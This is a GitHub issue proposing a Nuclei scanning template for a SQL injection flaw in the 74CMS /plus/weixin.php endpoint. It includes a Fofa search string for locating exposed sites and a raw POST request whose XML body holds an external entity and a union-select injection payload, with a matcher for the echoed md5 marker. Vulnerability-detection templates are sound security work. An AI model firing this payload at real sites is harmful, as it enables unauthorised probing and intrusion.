### ISSUE TITLE
74CMS weixin.php SQLi

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7957]
### Template Information:

74CMS weixin.php SQLi
Fofa: app="骑士-74CMS"

### Nuclei Template:

```yaml
id: 74cms-wexin-sqli

info:
  name: 74CMS weixin.php SQLi
  author: SleepingBag945
  severity: high
  description: |
    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
  tags: sqli

http:
  - raw:
      - |
        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce=  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5(852963)#</Content></xml>


    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"662be8a28444fe9b80595f92b8493fc4")'
        condition: and

```
